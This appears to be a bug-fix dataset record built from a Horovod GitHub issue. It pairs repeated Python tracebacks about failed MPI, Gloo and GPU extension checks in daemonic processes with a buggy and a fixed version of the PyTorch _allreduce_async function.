d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/mxnet/__init__.py", line 23, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || __file__, 'mpi_lib')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 51, in check_extension
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'Horovod with %s=1 to debug the build error.' % (ext_name, ext_env_var))
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ImportError: Extension horovod.mxnet has not been built. If this is not expected, reinstall Horovod with HOROVOD_WITH_MXNET=1 to debug the build error.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension mxnet was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/bin/horovodrun", line 21, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || run_commandline()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 860, in run_commandline
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _run(args)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 828, in _run
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _launch_job(args, remote_host_names, settings, common_intfs, command)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 850, in _launch_job
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || elif gloo_built(verbose=(settings.verbose >= 2)):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 124, in gloo_built
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || raise RuntimeError('Failed to determine if Gloo support has been built. '
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || RuntimeError: Failed to determine if Gloo support has been built. Run again with --verbose for more details.
|
AssertionError
|
def _allreduce_async(tensor, output, name, op):
if tensor.dtype == torch.float16 and not _fp16_supported:
raise NotImplementedError(
"float16 allreduce is not supported for PyTorch version {} < 1.0.0".format(
torch.__version__
)
)
# Set the divisor for reduced gradients to average when necessary
if op == Average:
divisor = size()
elif op == Adasum:
if tensor.device.type != "cpu" and gpu_available("torch"):
if nccl_built():
if not is_homogeneous():
raise NotImplementedError(
"Running GPU Adasum on heterogeneous cluster is not supported yet."
)
elif not num_rank_is_power_2(int(size() / local_size())):
raise NotImplementedError(
"Running GPU Adasum with non-power of 2 nodes is not supported yet."
)
divisor = local_size()
else:
warnings.warn(
"Adasum reduction does not currently support GPU reduction using MPI. Tensors are "
"copied to CPU memory instead. To use Adasum for GPU reduction, please compile Horovod "
"with HOROVOD_GPU_ALLREDUCE=NCCL."
)
divisor = 1
else:
if not num_rank_is_power_2(size()):
raise NotImplementedError(
"Running Adasum with non-power of 2 ranks is not supported yet."
)
divisor = 1
else:
divisor = 1
# Averaging happens in framework code, so translate that to Sum for the actual call
true_op = Sum if op == Average else op
function = _check_function(_allreduce_function_factory, tensor)
handle = getattr(mpi_lib, function)(
tensor, output, divisor, name.encode() if name is not None else _NULL, true_op
)
_handle_map[handle] = (tensor, output)
return handle
|
def _allreduce_async(tensor, output, name, op):
if tensor.dtype == torch.float16 and not _fp16_supported:
raise NotImplementedError(
"float16 allreduce is not supported for PyTorch version {} < 1.0.0".format(
torch.__version__
)
)
# Set the divisor for reduced gradients to average when necessary
if op == Average:
divisor = size()
elif op == Adasum:
if tensor.device.type != "cpu" and _has_gpu:
if nccl_built():
if not is_homogeneous():
raise NotImplementedError(
"Running GPU Adasum on heterogeneous cluster is not supported yet."
)
elif not num_rank_is_power_2(int(size() / local_size())):
raise NotImplementedError(
"Running GPU Adasum with non-power of 2 nodes is not supported yet."
)
divisor = local_size()
else:
warnings.warn(
"Adasum reduction does not currently support "
"GPU reduction using MPI. Tensors are copied to CPU memory instead."
"To use Adasum for GPU reduction, please compile Horovod with HOROVOD_GPU_ALLREDUCE=NCCL."
)
divisor = 1
else:
if not num_rank_is_power_2(size()):
raise NotImplementedError(
"Running Adasum with non-power of 2 ranks is not supported yet."
)
divisor = 1
else:
divisor = 1
# Averaging happens in framework code, so translate that to Sum for the actual call
true_op = Sum if op == Average else op
function = _check_function(_allreduce_function_factory, tensor)
handle = getattr(mpi_lib, function)(
tensor, output, divisor, name.encode() if name is not None else _NULL, true_op
)
_handle_map[handle] = (tensor, output)
return handle
|
https://github.com/horovod/horovod/issues/1568
|
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension tensorflow was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/tensorflow/__init__.py", line 43, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || has_gpu = gpu_available('tensorflow')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension tensorflow was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension torch was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 39, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || from horovod.torch.mpi_ops import allreduce, allreduce_async, allreduce_, allreduce_async_
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 80, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _has_gpu = gpu_available('torch')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension torch was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension mxnet was built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/mxnet/__init__.py", line 23, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || __file__, 'mpi_lib')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 51, in check_extension
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'Horovod with %s=1 to debug the build error.' % (ext_name, ext_env_var))
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension mxnet was NOT built with MPI.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ImportError: Extension horovod.mxnet has not been built. If this is not expected, reinstall Horovod with HOROVOD_WITH_MXNET=1 to debug the build error.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension tensorflow was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/tensorflow/__init__.py", line 43, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || has_gpu = gpu_available('tensorflow')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension tensorflow was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension torch was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 39, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || from horovod.torch.mpi_ops import allreduce, allreduce_async, allreduce_, allreduce_async_
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 80, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _has_gpu = gpu_available('torch')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension torch was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension mxnet was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/mxnet/__init__.py", line 23, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || __file__, 'mpi_lib')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 51, in check_extension
